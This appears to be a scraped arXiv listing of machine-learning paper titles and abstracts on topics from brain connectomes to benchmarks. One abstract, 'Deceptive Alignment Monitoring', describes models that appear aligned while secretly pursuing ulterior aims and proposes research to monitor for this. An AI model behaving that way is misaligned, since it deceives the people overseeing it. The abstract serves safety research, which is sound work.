    Autism spectrum disorder(ASD) is a lifelong neurodevelopmental condition that affects social communication and behavior. Investigating functional magnetic resonance imaging (fMRI)-based brain functional connectome can aid in the understanding and diagnosis of ASD, leading to more effective treatments. The brain is modeled as a network of brain Regions of Interest (ROIs), and ROIs form communities and knowledge of these communities is crucial for ASD diagnosis. On the one hand, Transformer-based models have proven to be highly effective across several tasks, including fMRI connectome analysis to learn useful representations of ROIs. On the other hand, existing transformer-based models treat all ROIs equally and overlook the impact of community-specific associations when learning node embeddings. To fill this gap, we propose a novel method, Com-BrainTF, a hierarchical local-global transformer architecture that learns intra and inter-community aware node embeddings for ASD prediction task. Furthermore, we avoid over-parameterization by sharing the local transformer parameters for different communities but optimize unique learnable prompt tokens for each community. Our model outperforms state-of-the-art (SOTA) architecture on ABIDE dataset and has high interpretability, evident from the attention module. Our code is available at https://github.com/ubc-tea/Com-BrainTF.
    Can Instruction Fine-Tuned Language Models Identify Social Bias through Prompting?. (arXiv:2307.10472v1 [cs.CL])
    As the breadth and depth of language model applications continue to expand rapidly, it is increasingly important to build efficient frameworks for measuring and mitigating the learned or inherited social biases of these models. In this paper, we present our work on evaluating instruction fine-tuned language models' ability to identify bias through zero-shot prompting, including Chain-of-Thought (CoT) prompts. Across LLaMA and its two instruction fine-tuned versions, Alpaca 7B performs best on the bias identification task with an accuracy of 56.7%. We also demonstrate that scaling up LLM size and data diversity could lead to further performance gain. This is a work-in-progress presenting the first component of our bias mitigation framework. We will keep updating this work as we get more results.
    Torchhd: An Open Source Python Library to Support Research on Hyperdimensional Computing and Vector Symbolic Architectures. (arXiv:2205.09208v2 [cs.LG] UPDATED)
    Hyperdimensional computing (HD), also known as vector symbolic architectures (VSA), is a framework for computing with distributed representations by exploiting properties of random high-dimensional vector spaces. The commitment of the scientific community to aggregate and disseminate research in this particularly multidisciplinary area has been fundamental for its advancement. Joining these efforts, we present Torchhd, a high-performance open source Python library for HD/VSA. Torchhd seeks to make HD/VSA more accessible and serves as an efficient foundation for further research and application development. The easy-to-use library builds on top of PyTorch and features state-of-the-art HD/VSA functionality, clear documentation, and implementation examples from well-known publications. Comparing publicly available code with their corresponding Torchhd implementation shows that experiments can run up to 100x faster. Torchhd is available at: https://github.com/hyperdimensional-computing/torchhd.
    DP-TBART: A Transformer-based Autoregressive Model for Differentially Private Tabular Data Generation. (arXiv:2307.10430v1 [cs.LG])
    The generation of synthetic tabular data that preserves differential privacy is a problem of growing importance. While traditional marginal-based methods have achieved impressive results, recent work has shown that deep learning-based approaches tend to lag behind. In this work, we present Differentially-Private TaBular AutoRegressive Transformer (DP-TBART), a transformer-based autoregressive model that maintains differential privacy and achieves performance competitive with marginal-based methods on a wide variety of datasets, capable of even outperforming state-of-the-art methods in certain settings. We also provide a theoretical framework for understanding the limitations of marginal-based approaches and where deep learning-based approaches stand to contribute most. These results suggest that deep learning-based techniques should be considered as a viable alternative to marginal-based methods in the generation of differentially private synthetic tabular data.
    Confidence Estimation Using Unlabeled Data. (arXiv:2307.10440v1 [cs.LG])
    Overconfidence is a common issue for deep neural networks, limiting their deployment in real-world applications. To better estimate confidence, existing methods mostly focus on fully-supervised scenarios and rely on training labels. In this paper, we propose the first confidence estimation method for a semi-supervised setting, when most training labels are unavailable. We stipulate that even with limited training labels, we can still reasonably approximate the confidence of model on unlabeled samples by inspecting the prediction consistency through the training process. We use training consistency as a surrogate function and propose a consistency ranking loss for confidence estimation. On both image classification and segmentation tasks, our method achieves state-of-the-art performances in confidence estimation. Furthermore, we show the benefit of the proposed method through a downstream active learning task. The code is available at https://github.com/TopoXLab/consistency-ranking-loss
    Eliminating Label Leakage in Tree-Based Vertical Federated Learning. (arXiv:2307.10318v1 [cs.LG])
    Vertical federated learning (VFL) enables multiple parties with disjoint features of a common user set to train a machine learning model without sharing their private data. Tree-based models have become prevalent in VFL due to their interpretability and efficiency. However, the vulnerability of tree-based VFL has not been sufficiently investigated. In this study, we first introduce a novel label inference attack, ID2Graph, which utilizes the sets of record-IDs assigned to each node (i.e., instance space) to deduce private training labels. The ID2Graph attack generates a graph structure from training samples, extracts communities from the graph, and clusters the local dataset using community information. To counteract label leakage from the instance space, we propose an effective defense mechanism, ID-LMID, which prevents label leakage by focusing on mutual information regularization. Comprehensive experiments conducted on various datasets reveal that the ID2Graph attack presents significant risks to tree-based models such as Random Forest and XGBoost. Further evaluations on these benchmarks demonstrate that ID-LMID effectively mitigates label leakage in such instances.
    Automated Action Model Acquisition from Narrative Texts. (arXiv:2307.10247v1 [cs.CL])
    Action models, which take the form of precondition/effect axioms, facilitate causal and motivational connections between actions for AI agents. Action model acquisition has been identified as a bottleneck in the application of planning technology, especially within narrative planning. Acquiring action models from narrative texts in an automated way is essential, but challenging because of the inherent complexities of such texts. We present NaRuto, a system that extracts structured events from narrative text and subsequently generates planning-language-style action models based on predictions of commonsense event relations, as well as textual contradictions and similarities, in an unsupervised manner. Experimental results in classical narrative planning domains show that NaRuto can generate action models of significantly better quality than existing fully automated methods, and even on par with those of semi-automated methods.
    Automated Knowledge Modeling for Cancer Clinical Practice Guidelines. (arXiv:2307.10231v1 [cs.AI])
    Clinical Practice Guidelines (CPGs) for cancer diseases evolve rapidly due to new evidence generated by active research. Currently, CPGs are primarily published in a document format that is ill-suited for managing this developing knowledge. A knowledge model of the guidelines document suitable for programmatic interaction is required. This work proposes an automated method for extraction of knowledge from National Comprehensive Cancer Network (NCCN) CPGs in Oncology and generating a structured model containing the retrieved knowledge. The proposed method was tested using two versions of NCCN Non-Small Cell Lung Cancer (NSCLC) CPG to demonstrate the effectiveness in faithful extraction and modeling of knowledge. Three enrichment strategies using Cancer staging information, Unified Medical Language System (UMLS) Metathesaurus & National Cancer Institute thesaurus (NCIt) concepts, and Node classification are also presented to enhance the model towards enabling programmatic traversal and querying of cancer care guidelines. The Node classification was performed using a Support Vector Machine (SVM) model, achieving a classification accuracy of 0.81 with 10-fold cross-validation.
    A Review of Machine Learning Methods Applied to Structural Dynamics and Vibroacoustic. (arXiv:2204.06362v2 [cs.LG] UPDATED)
    The use of Machine Learning (ML) has rapidly spread across several fields, having encountered many applications in Structural Dynamics and Vibroacoustic (SD\&V). The increasing capabilities of ML to unveil insights from data, driven by unprecedented data availability, algorithms advances and computational power, enhance decision making, uncertainty handling, patterns recognition and real-time assessments. Three main applications in SD\&V have taken advantage of these benefits. In Structural Health Monitoring, ML detection and prognosis lead to safe operation and optimized maintenance schedules. System identification and control design are leveraged by ML techniques in Active Noise Control and Active Vibration Control. Finally, the so-called ML-based surrogate models provide fast alternatives to costly simulations, enabling robust and optimized product design. Despite the many works in the area, they have not been reviewed and analyzed. Therefore, to keep track and understand this ongoing integration of fields, this paper presents a survey of ML applications in SD\&V analyses, shedding light on the current state of implementation and emerging opportunities. The main methodologies, advantages, limitations, and recommendations based on scientific knowledge were identified for each of the three applications. Moreover, the paper considers the role of Digital Twins and Physics Guided ML to overcome current challenges and power future research progress. As a result, the survey provides a broad overview of the present landscape of ML applied in SD\&V and guides the reader to an advanced understanding of progress and prospects in the field.  ( 3 min )
    Novel Batch Active Learning Approach and Its Application to Synthetic Aperture Radar Datasets. (arXiv:2307.10495v1 [cs.LG])
    Active learning improves the performance of machine learning methods by judiciously selecting a limited number of unlabeled data points to query for labels, with the aim of maximally improving the underlying classifier's performance. Recent gains have been made using sequential active learning for synthetic aperture radar (SAR) data arXiv:2204.00005. In each iteration, sequential active learning selects a query set of size one while batch active learning selects a query set of multiple datapoints. While batch active learning methods exhibit greater efficiency, the challenge lies in maintaining model accuracy relative to sequential active learning methods. We developed a novel, two-part approach for batch active learning: Dijkstra's Annulus Core-Set (DAC) for core-set generation and LocalMax for batch sampling. The batch active learning process that combines DAC and LocalMax achieves nearly identical accuracy as sequential active learning but is more efficient, proportional to the batch size. As an application, a pipeline is built based on transfer learning feature embedding, graph learning, DAC, and LocalMax to classify the FUSAR-Ship and OpenSARShip datasets. Our pipeline outperforms the state-of-the-art CNN-based methods.
    Polyffusion: A Diffusion Model for Polyphonic Score Generation with Internal and External Controls. (arXiv:2307.10304v1 [cs.SD])
    We propose Polyffusion, a diffusion model that generates polyphonic music scores by regarding music as image-like piano roll representations. The model is capable of controllable music generation with two paradigms: internal control and external control. Internal control refers to the process in which users pre-define a part of the music and then let the model infill the rest, similar to the task of masked music generation (or music inpainting). External control conditions the model with external yet related information, such as chord, texture, or other features, via the cross-attention mechanism. We show that by using internal and external controls, Polyffusion unifies a wide range of music creation tasks, including melody generation given accompaniment, accompaniment generation given melody, arbitrary music segment inpainting, and music arrangement given chords or textures. Experimental results show that our model significantly outperforms existing Transformer and sampling-based baselines, and using pre-trained disentangled representations as external conditions yields more effective controls.
    Reproducibility in Machine Learning-Driven Research. (arXiv:2307.10320v1 [cs.LG])
    Research is facing a reproducibility crisis, in which the results and findings of many studies are difficult or even impossible to reproduce. This is also the case in machine learning (ML) and artificial intelligence (AI) research. Often, this is the case due to unpublished data and/or source-code, and due to sensitivity to ML training conditions. Although different solutions to address this issue are discussed in the research community such as using ML platforms, the level of reproducibility in ML-driven research is not increasing substantially. Therefore, in this mini survey, we review the literature on reproducibility in ML-driven research with three main aims: (i) reflect on the current situation of ML reproducibility in various research fields, (ii) identify reproducibility issues and barriers that exist in these research fields applying ML, and (iii) identify potential drivers such as tools, practices, and interventions that support ML reproducibility. With this, we hope to contribute to decisions on the viability of different solutions for supporting ML reproducibility.
    Performance Issue Identification in Cloud Systems with Relational-Temporal Anomaly Detection. (arXiv:2307.10869v1 [cs.LG])
    Performance issues permeate large-scale cloud service systems, which can lead to huge revenue losses. To ensure reliable performance, it's essential to accurately identify and localize these issues using service monitoring metrics. Given the complexity and scale of modern cloud systems, this task can be challenging and may require extensive expertise and resources beyond the capacity of individual humans. Some existing methods tackle this problem by analyzing each metric independently to detect anomalies. However, this could incur overwhelming alert storms that are difficult for engineers to diagnose manually. To pursue better performance, not only the temporal patterns of metrics but also the correlation between metrics (i.e., relational patterns) should be considered, which can be formulated as a multivariate metrics anomaly detection problem. However, most of the studies fall short of extracting these two types of features explicitly. Moreover, there exist some unlabeled anomalies mixed in the training data, which may hinder the detection performance. To address these limitations, we propose the Relational- Temporal Anomaly Detection Model (RTAnomaly) that combines the relational and temporal information of metrics. RTAnomaly employs a graph attention layer to learn the dependencies among metrics, which will further help pinpoint the anomalous metrics that may cause the anomaly effectively. In addition, we exploit the concept of positive unlabeled learning to address the issue of potential anomalies in the training data. To evaluate our method, we conduct experiments on a public dataset and two industrial datasets. RTAnomaly outperforms all the baseline models by achieving an average F1 score of 0.929 and Hit@3 of 0.920, demonstrating its superiority.  ( 3 min )
    Data-Efficient Augmentation for Training Neural Networks. (arXiv:2210.08363v3 [cs.LG] UPDATED)
    Data augmentation is essential to achieve state-of-the-art performance in many deep learning applications. However, the most effective augmentation techniques become computationally prohibitive for even medium-sized datasets. To address this, we propose a rigorous technique to select subsets of data points that when augmented, closely capture the training dynamics of full data augmentation. We first show that data augmentation, modeled as additive perturbations, improves learning and generalization by relatively enlarging and perturbing the smaller singular values of the network Jacobian, while preserving its prominent directions. This prevents overfitting and enhances learning the harder to learn information. Then, we propose a framework to iteratively extract small subsets of training data that when augmented, closely capture the alignment of the fully augmented Jacobian with labels/residuals. We prove that stochastic gradient descent applied to the augmented subsets found by our approach has similar training dynamics to that of fully augmented data. Our experiments demonstrate that our method achieves 6.3x speedup on CIFAR10 and 2.2x speedup on SVHN, and outperforms the baselines by up to 10% across various subset sizes. Similarly, on TinyImageNet and ImageNet, our method beats the baselines by up to 8%, while achieving up to 3.3x speedup across various subset sizes. Finally, training on and augmenting 50% subsets using our method on a version of CIFAR10 corrupted with label noise even outperforms using the full dataset. Our code is available at: https://github.com/tianyu139/data-efficient-augmentation  ( 3 min )
    AlignAtt: Using Attention-based Audio-Translation Alignments as a Guide for Simultaneous Speech Translation. (arXiv:2305.11408v2 [cs.CL] UPDATED)
    Attention is the core mechanism of today's most used architectures for natural language processing and has been analyzed from many perspectives, including its effectiveness for machine translation-related tasks. Among these studies, attention resulted to be a useful source of information to get insights about word alignment also when the input text is substituted with audio segments, as in the case of the speech translation (ST) task. In this paper, we propose AlignAtt, a novel policy for simultaneous ST (SimulST) that exploits the attention information to generate source-target alignments that guide the model during inference. Through experiments on the 8 language pairs of MuST-C v1.0, we show that AlignAtt outperforms previous state-of-the-art SimulST policies applied to offline-trained models with gains in terms of BLEU of 2 points and latency reductions ranging from 0.5s to 0.8s across the 8 languages.  ( 2 min )
    Sequential Kernel Embedding for Mediated and Time-Varying Dose Response Curves. (arXiv:2111.03950v4 [stat.ME] UPDATED)
    We propose simple nonparametric estimators for mediated and time-varying dose response curves based on kernel ridge regression. By embedding Pearl's mediation formula and Robins' g-formula with kernels, we allow treatments, mediators, and covariates to be continuous in general spaces, and also allow for nonlinear treatment-confounder feedback. Our key innovation is a reproducing kernel Hilbert space technique called sequential kernel embedding, which we use to construct simple estimators for complex causal estimands. Our estimators preserve the generality of classic identification while also achieving nonasymptotic uniform rates. In nonlinear simulations with many covariates, we demonstrate strong performance. We estimate mediated and time-varying dose response curves of the US Job Corps, and clean data that may serve as a benchmark in future work. We extend our results to mediated and time-varying treatment effects and counterfactual distributions, verifying semiparametric efficiency and weak convergence.  ( 2 min )
    Robust Principal Component Analysis: A Median of Means Approach. (arXiv:2102.03403v2 [stat.ML] UPDATED)
    Principal Component Analysis (PCA) is a fundamental tool for data visualization, denoising, and dimensionality reduction. It is widely popular in Statistics, Machine Learning, Computer Vision, and related fields. However, PCA is well-known to fall prey to outliers and often fails to detect the true underlying low-dimensional structure within the dataset. Following the Median of Means (MoM) philosophy, recent supervised learning methods have shown great success in dealing with outlying observations without much compromise to their large sample theoretical properties. This paper proposes a PCA procedure based on the MoM principle. Called the \textbf{M}edian of \textbf{M}eans \textbf{P}rincipal \textbf{C}omponent \textbf{A}nalysis (MoMPCA), the proposed method is not only computationally appealing but also achieves optimal convergence rates under minimal assumptions. In particular, we explore the non-asymptotic error bounds of the obtained solution via the aid of the Rademacher complexities while granting absolutely no assumption on the outlying observations. The derived concentration results are not dependent on the dimension because the analysis is conducted in a separable Hilbert space, and the results only depend on the fourth moment of the underlying distribution in the corresponding norm. The proposal's efficacy is also thoroughly showcased through simulations and real data applications.  ( 2 min )
    ProtiGeno: a prokaryotic short gene finder using protein language models. (arXiv:2307.10343v1 [q-bio.GN])
    Prokaryotic gene prediction plays an important role in understanding the biology of organisms and their function with applications in medicine and biotechnology. Although the current gene finders are highly sensitive in finding long genes, their sensitivity decreases noticeably in finding shorter genes (<180 nts). The culprit is insufficient annotated gene data to identify distinguishing features in short open reading frames (ORFs). We develop a deep learning-based method called ProtiGeno, specifically targeting short prokaryotic genes using a protein language model trained on millions of evolved proteins. In systematic large-scale experiments on 4,288 prokaryotic genomes, we demonstrate that ProtiGeno predicts short coding and noncoding genes with higher accuracy and recall than the current state-of-the-art gene finders. We discuss the predictive features of ProtiGeno and possible limitations by visualizing the three-dimensional structure of the predicted short genes. Data, codes, and models are available at https://github.com/tonytu16/protigeno.
    TwinLiteNet: An Efficient and Lightweight Model for Driveable Area and Lane Segmentation in Self-Driving Cars. (arXiv:2307.10705v1 [cs.CV])
    Semantic segmentation is a common task in autonomous driving to understand the surrounding environment. Driveable Area Segmentation and Lane Detection are particularly important for safe and efficient navigation on the road. However, original semantic segmentation models are computationally expensive and require high-end hardware, which is not feasible for embedded systems in autonomous vehicles. This paper proposes a lightweight model for the driveable area and lane line segmentation. TwinLiteNet is designed cheaply but achieves accurate and efficient segmentation results. We evaluate TwinLiteNet on the BDD100K dataset and compare it with modern models. Experimental results show that our TwinLiteNet performs similarly to existing approaches, requiring significantly fewer computational resources. Specifically, TwinLiteNet achieves a mIoU score of 91.3% for the Drivable Area task and 31.08% IoU for the Lane Detection task with only 0.4 million parameters and achieves 415 FPS on GPU RTX A5000. Furthermore, TwinLiteNet can run in real-time on embedded devices with limited computing power, especially since it achieves 60FPS on Jetson Xavier NX, making it an ideal solution for self-driving vehicles. Code is available: url{https://github.com/chequanghuy/TwinLiteNet}.
    Regular SE(3) Group Convolutions for Volumetric Medical Image Analysis. (arXiv:2306.13960v2 [cs.CV] UPDATED)
    Regular group convolutional neural networks (G-CNNs) have been shown to increase model performance and improve equivariance to different geometrical symmetries. This work addresses the problem of SE(3), i.e., roto-translation equivariance, on volumetric data. Volumetric image data is prevalent in many medical settings. Motivated by the recent work on separable group convolutions, we devise a SE(3) group convolution kernel separated into a continuous SO(3) (rotation) kernel and a spatial kernel. We approximate equivariance to the continuous setting by sampling uniform SO(3) grids. Our continuous SO(3) kernel is parameterized via RBF interpolation on similarly uniform grids. We demonstrate the advantages of our approach in volumetric medical image analysis. Our SE(3) equivariant models consistently outperform CNNs and regular discrete G-CNNs on challenging medical classification tasks and show significantly improved generalization capabilities. Our approach achieves up to a 16.5% gain in accuracy over regular CNNs.
    Analyzing sports commentary in order to automatically recognize events and extract insights. (arXiv:2307.10303v1 [cs.CL])
    In this paper, we carefully investigate how we can use multiple different Natural Language Processing techniques and methods in order to automatically recognize the main actions in sports events. We aim to extract insights by analyzing live sport commentaries from different sources and by classifying these major actions into different categories. We also study if sentiment analysis could help detect these main actions.
    Integrating a Heterogeneous Graph with Entity-aware Self-attention using Relative Position Labels for Reading Comprehension Model. (arXiv:2307.10443v1 [cs.CL])
    Despite the significant progress made by transformer models in machine reading comprehension tasks, they still face limitations in handling complex reasoning tasks due to the absence of explicit knowledge in the input sequence. This paper proposes a novel attention pattern to overcome this limitation, which integrates reasoning knowledge derived from a heterogeneous graph into the transformer architecture using a graph-enhanced self-attention mechanism. The proposed attention pattern comprises three key elements: global-local attention for word tokens, graph attention for entity tokens that exhibit strong attention towards tokens connected in the graph as opposed to those unconnected, and the consideration of the type of relationship between each entity token and word token. This results in optimized attention between the two if a relationship exists. The pattern is coupled with special relative position labels, allowing it to integrate with LUKE's entity-aware self-attention mechanism. The experimental findings corroborate that our model outperforms both the cutting-edge LUKE-Graph and the baseline LUKE model on the ReCoRD dataset that focuses on commonsense reasoning.
    Multi-Scale U-Shape MLP for Hyperspectral Image Classification. (arXiv:2307.10186v1 [eess.IV])
    Hyperspectral images have significant applications in various domains, since they register numerous semantic and spatial information in the spectral band with spatial variability of spectral signatures. Two critical challenges in identifying pixels of the hyperspectral image are respectively representing the correlated information among the local and global, as well as the abundant parameters of the model. To tackle this challenge, we propose a Multi-Scale U-shape Multi-Layer Perceptron (MUMLP) a model consisting of the designed MSC (Multi-Scale Channel) block and the UMLP (U-shape Multi-Layer Perceptron) structure. MSC transforms the channel dimension and mixes spectral band feature to embed the deep-level representation adequately. UMLP is designed by the encoder-decoder structure with multi-layer perceptron layers, which is capable of compressing the large-scale parameters. Extensive experiments are conducted to demonstrate our model can outperform state-of-the-art methods across-the-board on three wide-adopted public datasets, namely Pavia University, Houston 2013 and Houston 2018
    A Competitive Learning Approach for Specialized Models: A Solution for Complex Physical Systems with Distinct Functional Regimes. (arXiv:2307.10496v1 [cs.LG])
    Complex systems in science and engineering sometimes exhibit behavior that changes across different regimes. Traditional global models struggle to capture the full range of this complex behavior, limiting their ability to accurately represent the system. In response to this challenge, we propose a novel competitive learning approach for obtaining data-driven models of physical systems. The primary idea behind the proposed approach is to employ dynamic loss functions for a set of models that are trained concurrently on the data. Each model competes for each observation during training, allowing for the identification of distinct functional regimes within the dataset. To demonstrate the effectiveness of the learning approach, we coupled it with various regression methods that employ gradient-based optimizers for training. The proposed approach was tested on various problems involving model discovery and function approximation, demonstrating its ability to successfully identify functional regimes, discover true governing equations, and reduce test errors.
    Decentralized Smart Charging of Large-Scale EVs using Adaptive Multi-Agent Multi-Armed Bandits. (arXiv:2307.10704v1 [cs.LG])
    The drastic growth of electric vehicles and photovoltaics can introduce new challenges, such as electrical current congestion and voltage limit violations due to peak load demands. These issues can be mitigated by controlling the operation of electric vehicles i.e., smart charging. Centralized smart charging solutions have already been proposed in the literature. But such solutions may lack scalability and suffer from inherent drawbacks of centralization, such as a single point of failure, and data privacy concerns. Decentralization can help tackle these challenges. In this paper, a fully decentralized smart charging system is proposed using the philosophy of adaptive multi-agent systems. The proposed system utilizes multi-armed bandit learning to handle uncertainties in the system. The presented system is decentralized, scalable, real-time, model-free, and takes fairness among different players into account. A detailed case study is also presented for performance evaluation.  ( 2 min )
    Assessing the Use of AutoML for Data-Driven Software Engineering. (arXiv:2307.10774v1 [cs.SE])
    Background. Due to the widespread adoption of Artificial Intelligence (AI) and Machine Learning (ML) for building software applications, companies are struggling to recruit employees with a deep understanding of such technologies. In this scenario, AutoML is soaring as a promising solution to fill the AI/ML skills gap since it promises to automate the building of end-to-end AI/ML pipelines that would normally be engineered by specialized team members. Aims. Despite the growing interest and high expectations, there is a dearth of information about the extent to which AutoML is currently adopted by teams developing AI/ML-enabled systems and how it is perceived by practitioners and researchers. Method. To fill these gaps, in this paper, we present a mixed-method study comprising a benchmark of 12 end-to-end AutoML tools on two SE datasets and a user survey with follow-up interviews to further our understanding of AutoML adoption and perception. Results. We found that AutoML solutions can generate models that outperform those trained and optimized by researchers to perform classification tasks in the SE domain. Also, our findings show that the currently available AutoML solutions do not live up to their names as they do not equally support automation across the stages of the ML development workflow and for all the team members. Conclusions. We derive insights to inform the SE research community on how AutoML can facilitate their activities and tool builders on how to design the next generation of AutoML technologies.  ( 3 min )
    Self2Self+: Single-Image Denoising with Self-Supervised Learning and Image Quality Assessment Loss. (arXiv:2307.10695v1 [cs.CV])
    Recently, denoising methods based on supervised learning have exhibited promising performance. However, their reliance on external datasets containing noisy-clean image pairs restricts their applicability. To address this limitation, researchers have focused on training denoising networks using solely a set of noisy inputs. To improve the feasibility of denoising procedures, in this study, we proposed a single-image self-supervised learning method in which only the noisy input image is used for network training. Gated convolution was used for feature extraction and no-reference image quality assessment was used for guiding the training process. Moreover, the proposed method sampled instances from the input image dataset using Bernoulli sampling with a certain dropout rate for training. The corresponding result was produced by averaging the generated predictions from various instances of the trained network with dropouts. The experimental results indicated that the proposed method achieved state-of-the-art denoising performance on both synthetic and real-world datasets. This highlights the effectiveness and practicality of our method as a potential solution for various noise removal tasks.  ( 2 min )
    FigCaps-HF: A Figure-to-Caption Generative Framework and Benchmark with Human Feedback. (arXiv:2307.10867v1 [cs.CL])
    Captions are crucial for understanding scientific visualizations and documents. Existing captioning methods for scientific figures rely on figure-caption pairs extracted from documents for training, many of which fall short with respect to metrics like helpfulness, explainability, and visual-descriptiveness [15] leading to generated captions being misaligned with reader preferences. To enable the generation of high-quality figure captions, we introduce FigCaps-HF a new framework for figure-caption generation that can incorporate domain expert feedback in generating captions optimized for reader preferences. Our framework comprises of 1) an automatic method for evaluating quality of figure-caption pairs, 2) a novel reinforcement learning with human feedback (RLHF) method to optimize a generative figure-to-caption model for reader preferences. We demonstrate the effectiveness of our simple learning framework by improving performance over standard fine-tuning across different types of models. In particular, when using BLIP as the base model, our RLHF framework achieves a mean gain of 35.7%, 16.9%, and 9% in ROUGE, BLEU, and Meteor, respectively. Finally, we release a large-scale benchmark dataset with human feedback on figure-caption pairs to enable further evaluation and development of RLHF techniques for this problem.  ( 2 min )
    Deceptive Alignment Monitoring. (arXiv:2307.10569v1 [cs.LG])
    As the capabilities of large machine learning models continue to grow, and as the autonomy afforded to such models continues to expand, the spectre of a new adversary looms: the models themselves. The threat that a model might behave in a seemingly reasonable manner, while secretly and subtly modifying its behavior for ulterior reasons is often referred to as deceptive alignment in the AI Safety & Alignment communities. Consequently, we call this new direction Deceptive Alignment Monitoring. In this work, we identify emerging directions in diverse machine learning subfields that we believe will become increasingly important and intertwined in the near future for deceptive alignment monitoring, and we argue that advances in these fields present both long-term challenges and new research opportunities. We conclude by advocating for greater involvement by the adversarial machine learning community in these emerging directions.  ( 2 min )
    SciBench: Evaluating College-Level Scientific Problem-Solving Abilities of Large Language Models. (arXiv:2307.10635v1 [cs.CL])
    Recent advances in large language models (LLMs) have demonstrated notable progress on many mathematical benchmarks. However, most of these benchmarks only feature problems grounded in junior and senior high school subjects, contain only multiple-choice questions, and are confined to a limited scope of elementary arithmetic operations. To address these issues, this paper introduces an expansive benchmark suite SciBench that aims to systematically examine the reasoning capabilities required for complex scientific problem solving. SciBench contains two carefully curated datasets: an open set featuring a range of collegiate-level scientific problems drawn from mathematics, chemistry, and physics textbooks, and a closed set comprising problems from undergraduate-level exams in computer science and mathematics. Based on the two datasets, we conduct an in-depth benchmark study of two representative LLMs with various prompting strategies. The results reveal that current LLMs fall short of delivering satisfactory performance, with an overall score of merely 35.80%. Furthermore, through a detailed user study, we categorize the errors made by LLMs into ten problem-solving abilities. Our analysis indicates that no single prompting strategy significantly outperforms others and some strategies that demonstrate improvements in certain problem-solving skills result in declines in other skills. We envision that SciBench will catalyze further developments in the reasoning abilities of LLMs, thereby ultimately contributing to scientific research and discovery.  ( 3 min )
    Nonlinear Meta-Learning Can Guarantee Faster Rates. (arXiv:2307.10870v1 [stat.ML])
    Many recent theoretical works on \emph{meta-learning} aim to achieve guarantees in leveraging similar representational structures from related tasks towards simplifying a target task. Importantly, the main aim in theory works on the subject is to understand the extent to which convergence rates -- in learning a common representation -- \emph{may scale with the number $N$ of tasks} (as well as the number of samples per task). First steps in this setting demonstrate this property when both the shared representation amongst tasks, and task-specific regression functions, are linear. This linear setting readily reveals the benefits of aggregating tasks, e.g., via averaging arguments. In practice, however, the representation is often highly nonlinear, introducing nontrivial biases in each task that cannot easily be averaged out as in the linear case. In the present work, we derive theoretical guarantees for meta-learning with nonlinear representations. In particular, assuming the shared nonlinearity maps to an infinite-dimensional RKHS, we show that additional biases can be mitigated with careful regularization that leverages the smoothness of task-specific regression functions,  ( 2 min )
    Mitigating Voter Attribute Bias for Fair Opinion Aggregation. (arXiv:2307.10749v1 [cs.HC])
    The aggregation of multiple opinions plays a crucial role in decision-making, such as in hiring and loan review, and in labeling data for supervised learning. Although majority voting and existing opinion aggregation models are effective for simple tasks, they are inappropriate for tasks without objectively true labels in which disagreements may occur. In particular, when voter attributes such as gender or race introduce bias into opinions, the aggregation results may vary depending on the composition of voter attributes. A balanced group of voters is desirable for fair aggregation results but may be difficult to prepare. In this study, we consider methods to achieve fair opinion aggregation based on voter attributes and evaluate the fairness of the aggregated results. To this end, we consider an approach that combines opinion aggregation models such as majority voting and the Dawid and Skene model (D&S model) with fairness options such as sample weighting. To evaluate the fairness of opinion aggregation, probabilistic soft labels are preferred over discrete class labels. First, we address the problem of soft label estimation without considering voter attributes and identify some issues with the D&S model. To address these limitations, we propose a new Soft D&S model with improved accuracy in estimating soft labels. Moreover, we evaluated the fairness of an opinion aggregation model, including Soft D&S, in combination with different fairness options using synthetic and semi-synthetic data. The experimental results suggest that the combination of Soft D&S and data splitting as a fairness option is effective for dense data, whereas weighted majority voting is effective for sparse data. These findings should prove particularly valuable in supporting decision-making by human and machine-learning models with balanced opinion aggregation.  ( 3 min )
    Fractional Denoising for 3D Molecular Pre-training. (arXiv:2307.10683v1 [q-bio.QM])
    Coordinate denoising is a promising 3D molecular pre-training method, which has achieved remarkable performance in various downstream drug discovery tasks. Theoretically, the objective is equivalent to learning the force field, which is revealed helpful for downstream tasks. Nevertheless, there are two challenges for coordinate denoising to learn an effective force field, i.e. low coverage samples and isotropic force field. The underlying reason is that molecular distributions assumed by existing denoising methods fail to capture the anisotropic characteristic of molecules. To tackle these challenges, we propose a novel hybrid noise strategy, including noises on both dihedral angel and coordinate. However, denoising such hybrid noise in a traditional way is no more equivalent to learning the force field. Through theoretical deductions, we find that the problem is caused by the dependency of the input conformation for covariance. To this end, we propose to decouple the two types of noise and design a novel fractional denoising method (Frad), which only denoises the latter coordinate part. In this way, Frad enjoys both the merits of sampling more low-energy structures and the force field equivalence. Extensive experiments show the effectiveness of Frad in molecular representation, with a new state-of-the-art on 9 out of 12 tasks of QM9 and on 7 out of 8 targets of MD17.  ( 2 min )
    Refining the Optimization Target for Automatic Univariate Time Series Anomaly Detection in Monitoring Services. (arXiv:2307.10653v1 [cs.LG])
    Time series anomaly detection is crucial for industrial monitoring services that handle a large volume of data, aiming to ensure reliability and optimize system performance. Existing methods often require extensive labeled resources and manual parameter selection, highlighting the need for automation. This paper proposes a comprehensive framework for automatic parameter optimization in time series anomaly detection models. The framework introduces three optimization targets: prediction score, shape score, and sensitivity score, which can be easily adapted to different model backbones without prior knowledge or manual labeling efforts. The proposed framework has been successfully applied online for over six months, serving more than 50,000 time series every minute. It simplifies the user's experience by requiring only an expected sensitive value, offering a user-friendly interface, and achieving desired detection results. Extensive evaluations conducted on public datasets and comparison with other methods further confirm the effectiveness of the proposed framework.  ( 2 min )
    Differences Between Hard and Noisy-labeled Samples: An Empirical Study. (arXiv:2307.10718v1 [cs.LG])
    Extracting noisy or incorrectly labeled samples from a labeled dataset with hard/difficult samples is an important yet under-explored topic. Two general and often independent lines of work exist, one focuses on addressing noisy labels, and another deals with hard samples. However, when both types of data are present, most existing methods treat them equally, which results in a decline in the overall performance of the model. In this paper, we first design various synthetic datasets with custom hardness and noisiness levels for different samples. Our proposed systematic empirical study enables us to better understand the similarities and more importantly the differences between hard-to-learn samples and incorrectly-labeled samples. These controlled experiments pave the way for the development of methods that distinguish between hard and noisy samples. Through our study, we introduce a simple yet effective metric that filters out noisy-labeled samples while keeping the hard samples. We study various data partitioning methods in the presence of label noise and observe that filtering out noisy samples from hard samples with this proposed metric results in the best datasets as evidenced by the high test accuracy achieved after models are trained on the filtered datasets. We demonstrate this for both our created synthetic datasets and for datasets with real-world label noise. Furthermore, our proposed data partitioning method significantly outperforms other methods when employed within a semi-supervised learning framework.  ( 2 min )
    Label Calibration for Semantic Segmentation Under Domain Shift. (arXiv:2307.10842v1 [cs.CV])
